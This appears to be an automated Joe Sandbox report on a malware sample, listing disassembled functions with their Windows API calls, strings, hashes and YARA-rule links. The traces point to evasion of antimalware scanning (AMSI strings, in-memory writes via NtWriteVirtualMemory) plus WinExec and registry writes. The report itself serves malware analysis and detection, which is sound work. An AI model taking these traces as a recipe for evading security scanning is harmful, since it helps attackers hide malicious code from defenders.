Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: b4166bc53e1328c452012d14076fed64189ad7e81d926994db85f032bd1c87af
Instruction ID: beb0ae10a0ee72e20d8e880d62e812f7a4d857a11231dfa91bd4141c9fc2e3c1
Opcode Fuzzy Hash: b4166bc53e1328c452012d14076fed64189ad7e81d926994db85f032bd1c87af
Instruction Fuzzy Hash: E9F0445054C38179E202E6748C49F4FBEDD4B92324F448A5DF1E8562D2D675D1058767

Function 027DE2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027DE436

Strings

ScanBuffer, xrefs: 027DE37F
OpenSession, xrefs: 027DE3D8
Initialize, xrefs: 027DE326

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 05e7d57321ea27dc39e185b6dd22c923595474b8abf9a2394846db3d3b8ad2e3
Instruction ID: ccdd00ba2d1a18279cfbfa393fb1ed094fb3112375b05cb97f545e1a823991c5
Opcode Fuzzy Hash: 05e7d57321ea27dc39e185b6dd22c923595474b8abf9a2394846db3d3b8ad2e3
Instruction Fuzzy Hash: 9741EA71A501189BEB12FBB4CDA5E9EB7FAEF8C310F21443DE041AB244DA74AD018F60

Function 027D840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

WinExec.KERNEL32(?,?), ref: 027D8478

Strings

Kernel32, xrefs: 027D845B
WinExec, xrefs: 027D8429

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 1e3e46242bee6f53032ce3a8e7d9ef5008b92a2ec6d6ab00087acf4a32b7cf4c
Instruction ID: 4a4739277df85d2c9ef4b3789d31258400cf1e601a76ff2a08d79d8665554cad
Opcode Fuzzy Hash: 1e3e46242bee6f53032ce3a8e7d9ef5008b92a2ec6d6ab00087acf4a32b7cf4c
Instruction Fuzzy Hash: 69018179644208BFEB11EFA4DC69F5A7BFEE748700FA28428F504D3640D678BD058B25

Function 027D8410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

WinExec.KERNEL32(?,?), ref: 027D8478

Strings

Kernel32, xrefs: 027D845B
WinExec, xrefs: 027D8429

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: b668c782ab5d40aec74b1317876ccaed08c1cf13aeb8ebb75a9e38dc93218864
Instruction ID: b888e119cf7d171ff11c653ee23efca516940fbab5c3cd9406afb35b6102a168
Opcode Fuzzy Hash: b668c782ab5d40aec74b1317876ccaed08c1cf13aeb8ebb75a9e38dc93218864
Instruction Fuzzy Hash: 65F08179644208BFEB11EFA4DC69F5A7BFEE748700FA28428F504D3640D678B9058B25

Function 027D5BB4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027D5CFC,?,?,027D3888,00000001), ref: 027D5C10
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027D5CFC,?,?,027D3888,00000001), ref: 027D5C3E

Part of subcall function 027C7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,027D3888,027D5C7E,00000000,027D5CFC,?,?,027D3888), ref: 027C7D66

Part of subcall function 027C7F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,027D3888,027D5C99,00000000,027D5CFC,?,?,027D3888,00000001), ref: 027C7F3F

GetLastError.KERNEL32(00000000,027D5CFC,?,?,027D3888,00000001), ref: 027D5CA3

Part of subcall function 027CA700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,027CC361,00000000,027CC3BB), ref: 027CA71F

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 0288c47437545926f14b2950ec971366316de3742301a0900e777cb709734e0c
Instruction ID: 3180a25668ce6201525b2c2d64b199fb18553c088fdc0062af25f4e0e879919c
Opcode Fuzzy Hash: 0288c47437545926f14b2950ec971366316de3742301a0900e777cb709734e0c
Instruction Fuzzy Hash: F1316374A002199FDB01EFB8C89579EBBF6AF48314FA0846DE904E7380DB7559058FA5

Function 027DE6BE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02915914), ref: 027DE704
RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE73C
RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE747

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 2f9602c7d913a8db1775a846004281514e1539a1e8f368e5d3b320e6845492dd
Instruction ID: 66f6095e776d5c1388a968c802586ba33ed5419691dfb173ccbe64d0c46b8d0e
Opcode Fuzzy Hash: 2f9602c7d913a8db1775a846004281514e1539a1e8f368e5d3b320e6845492dd
Instruction Fuzzy Hash: D0118C71A50218AFEB06EFB8D8A596E7BFDEB48320FA1002CB505DB250D730DE00CA61

Function 027DE6C0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02915914), ref: 027DE704
RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE73C
RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE747

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: b243765fd4eb3792062ebfbe49dc1f15ff6894765dc07398a164db9610af2e32
Instruction ID: 61fac3968d67878e965124128bbe75d89574e34aae42892ed8c0fc44a9f6a4ac
Opcode Fuzzy Hash: b243765fd4eb3792062ebfbe49dc1f15ff6894765dc07398a164db9610af2e32
Instruction Fuzzy Hash: C4118C71A50218AFEB06EFB8D8A596E7BBDEB48320FA1002CB505DB250D730DA00CA61

Function 027CE2EC Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 027CE2FB

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f55f3649965995973b169e913ebded30048cee28afb93ac6f0ae8e9c705b5673
Instruction ID: 4ac30d737b128bbb5bb49804b49a22e6377746e9ccae1e04d81028791b2169fc
Opcode Fuzzy Hash: f55f3649965995973b169e913ebded30048cee28afb93ac6f0ae8e9c705b5673
Instruction Fuzzy Hash: EFF0622470421487D722BB39C9CC66D269EBF81710B71543EA48AAB286CB34EC46CB62

Function 027C4CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 027C4D07
SysFreeString.OLEAUT32(00000000), ref: 027C4D19

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
Instruction ID: f489d154f14f04dd5482227d9025aab7bbafb722a25934a8d71547664d98c47c
Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
Instruction Fuzzy Hash: 2BE012FC2062015EEF252F31DC64B37772AAFC1741B7444ADA804CA169DB34D441AE34

Function 027D7064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 027D7362

Strings

H, xrefs: 027D7119

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: b95a6ea17d0594774d646628b1e709403209a4723446e0fb73e0513076139b50
Instruction ID: 06460ed43271882006e1a569281f6d495b9e776a4dcf9caf6610d8995dbbcadb
Opcode Fuzzy Hash: b95a6ea17d0594774d646628b1e709403209a4723446e0fb73e0513076139b50
Instruction Fuzzy Hash: 0BB1E074A016489FDB19CFA9D880A9EFBF6FF89314F248569E805AB360D731AC45CF50

Function 027D8824 Relevance: 3.1, APIs: 2, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74

FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
String ID:
API String ID: 3283153180-0
Opcode ID: 678b1df041d189950aaafa80ec419ed1cc256885a9d9b2e87d5715bdcd7e2dcb
Instruction ID: f7ad1374bdec0a3891c13fb7816988faa6875898bc425638ba16669bcd03ab8a
Opcode Fuzzy Hash: 678b1df041d189950aaafa80ec419ed1cc256885a9d9b2e87d5715bdcd7e2dcb
Instruction Fuzzy Hash: 3E11D678A40314AFEB16FBB4DA5EA5E77BADB45710F72047CB208F3B81CA3899054B15

Function 027CE6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 027CE709

Part of subcall function 027CE2EC: VariantClear.OLEAUT32(?), ref: 027CE2FB

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 96f2b68a4013dd40952554c94f3bf696cd20cc46e2d2167009ebb9bf0d8a08ed
Instruction ID: e3472507e1936811b95808f638146492818553a92c4d37831f4e1863220c8241
Opcode Fuzzy Hash: 96f2b68a4013dd40952554c94f3bf696cd20cc46e2d2167009ebb9bf0d8a08ed
Instruction Fuzzy Hash: 9E11822070021197C732AF39CDC866677AAEF85750735943EE94AAF25ADB30CC41CB62

Function 027C15CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,027C1A03,?,027C2000), ref: 027C15E2

Strings

0`, xrefs: 027C161D, 027C163A

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AllocVirtual
String ID: 0`
API String ID: 4275171209-3339448193
Opcode ID: 307e4559847121004791d6b698fd4455ed73501a99075d713c90dae0ff9b7907
Instruction ID: 9de3c2f69220ce88664a92467b916c511b2f5ccdf1e983afc49957dc47d76d50
Opcode Fuzzy Hash: 307e4559847121004791d6b698fd4455ed73501a99075d713c90dae0ff9b7907
Instruction Fuzzy Hash: C0F0F9F4B513004FEB0ADF7999443067ADAEB8A344F64897DDB09DB3D9E77194118B10

Function 027CE384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 027CE3C4

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: b3abfdefeffe100e5baed2334d119d4c9d82877abb308b0cad321b4269446af5
Instruction ID: 475752ce743f7d90e01d8ebc5654e250850b3ffbdf8932fc33fc8e706f21aa8c
Opcode Fuzzy Hash: b3abfdefeffe100e5baed2334d119d4c9d82877abb308b0cad321b4269446af5
Instruction Fuzzy Hash: EC313E71A00249AFDB11DEB8C989AAE77F8EB0C304F64456DF905D3251D734EA51CBA2

Function 027D6CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,027D6D41,?,?,?,00000000), ref: 027D6D21

Part of subcall function 027C4C0C: SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 2e83a0193070f540739f5c18aa9bd46c2cd6fdc9392a9cf26be86bc4e05c025e
Instruction ID: cbefdf5a977d3ba09958bdd0266188be22d76417a6d6f745162c8e968ac6bd91
Opcode Fuzzy Hash: 2e83a0193070f540739f5c18aa9bd46c2cd6fdc9392a9cf26be86bc4e05c025e
Instruction Fuzzy Hash: 83E0E570200204BBEB02FBB2EC6595A7BBDEB49B00B6104B9E501D3110D930AD009960

Function 027C5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027C5832

Part of subcall function 027C5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,027C0000,027ED790), ref: 027C5A94
Part of subcall function 027C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AB2
Part of subcall function 027C5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AD0
Part of subcall function 027C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027C5AEE
Part of subcall function 027C5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027C5B37
Part of subcall function 027C5A78: RegQueryValueExA.ADVAPI32(?,027C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001), ref: 027C5B55
Part of subcall function 027C5A78: RegCloseKey.ADVAPI32(?,027C5B84,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027C5B77

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: b2d1e55c612dd1c5e4acfff4aa90413ab83f8105c108b954c6e8e5cd4dbf6ce6
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
